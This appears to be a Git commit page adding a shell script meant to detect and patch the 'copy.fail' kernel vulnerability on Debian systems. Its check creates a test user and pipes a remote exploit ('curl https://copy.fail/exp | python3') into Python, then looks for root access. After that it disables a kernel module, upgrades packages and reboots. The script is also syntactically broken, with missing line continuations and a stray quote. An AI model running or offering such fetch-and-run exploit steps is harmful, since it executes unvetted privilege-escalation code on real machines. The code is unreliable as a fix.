corwin/sysmisc
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

add script to try patching for copy.fail

Browse source 
Try to automate detecting and patching for copy.fail on debian/apt systems.

For information on the vulnerability please see: https://copy.fail
This commit is contained in:
Corwin Brust 2026-04-30 11:59:44 -05:00
parent dce92ae6d0
commit 1710ac5cdd
1 changed files with 42 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

42
fix-copy-fail.sh Normal file
View file

@ -0,0 +1,42 @@
#!/usr/bin/sh
# Copyright (c) 2026 Corwin Brust <corwin@bru.st>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Delete the test user if it exists
# NOTE: this make the script repeatable however
# it will still abandon the 'testu' account
#
# To remove the test account after patching:
# deluser testu
#
grep '^testu ' /etc/passwd && deluser testu;
# Note this may not work all in one shot
# due to the exploit screwing with the kernel
# usermap resident in memory.
adduser --disabled-password --gecos='""' testu \
&& su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \
&& echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail" \
&& echo
&& echo "The system MUST be restarted before confirming the fix."
&& echo "If changes are made this should happen automatically but do it manually if that fails."
&& echo
&& echo "Pausing for ten seconds before attempting to fix..""
&& sleep 10 \
&& echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \
&& rmmod algif_aead \
&& apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \
|| echo "Check halted: check above for error messages.\n" \
"If the only error message you see if from grep you patched for copy.fail."